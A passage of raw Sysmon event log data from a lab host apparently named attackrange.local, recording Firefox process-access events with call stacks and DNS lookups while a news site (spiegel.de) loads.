Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.519{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.519{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.519{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.725{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.prod.www.spiegel.de0type: 5 sni.cdn.prod.www.spiegel.de.c.footprint.net;::ffff:8.238.30.122;::ffff:8.238.31.122;::ffff:8.241.78.122;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.536{59A5CD1D-945A-6005-3305-00000000A301}7052aacfb9d106f4.link11.de9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.534{59A5CD1D-945A-6005-3305-00000000A301}7052aacfb9d106f4.link11.de0128.65.210.182;128.65.210.183;128.65.210.184;128.65.210.185;128.65.210.180;128.65.210.181;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.533{59A5CD1D-945A-6005-3305-00000000A301}7052www.spiegel.de0type: 5 aacfb9d106f4.link11.de;::ffff:128.65.210.181;::ffff:128.65.210.182;::ffff:128.65.210.183;::ffff:128.65.210.184;::ffff:128.65.210.185;::ffff:128.65.210.180;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:40.883{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:40.883{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:39.272{59A5CD1D-8E56-6005-2E00-00000000A301}2464122.30.238.8.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:39.184{59A5CD1D-8E56-6005-2E00-00000000A301}2464181.210.65.128.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:39.181{59A5CD1D-8E56-6005-2E00-00000000A301}2464193.88.79.104.in-addr.arpa.0type: 12 a104-79-88-193.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.741{59A5CD1D-945A-6005-3305-00000000A301}7052e7808.dscg.akamaiedge.net02a02:26f0:1700:494::1e80;2a02:26f0:1700:483::1e80;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.738{59A5CD1D-945A-6005-3305-00000000A301}7052e7808.dscg.akamaiedge.net0104.79.88.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.738{59A5CD1D-945A-6005-3305-00000000A301}7052sni.cdn.prod.www.spiegel.de.c.footprint.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.738{59A5CD1D-945A-6005-3305-00000000A301}7052assets.adobedtm.com0type: 5 cn-assets.adobedtm.com.edgekey.net;type: 5 e7808.dscg.akamaiedge.net;::ffff:104.79.88.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.726{59A5CD1D-945A-6005-3305-00000000A301}7052sni.cdn.prod.www.spiegel.de.c.footprint.net08.238.31.122;8.241.78.122;8.238.30.122;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.746{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.712{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.682{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.665{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.313{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.313{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.309{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.308{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.305{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.239{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.238{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.237{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.237{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 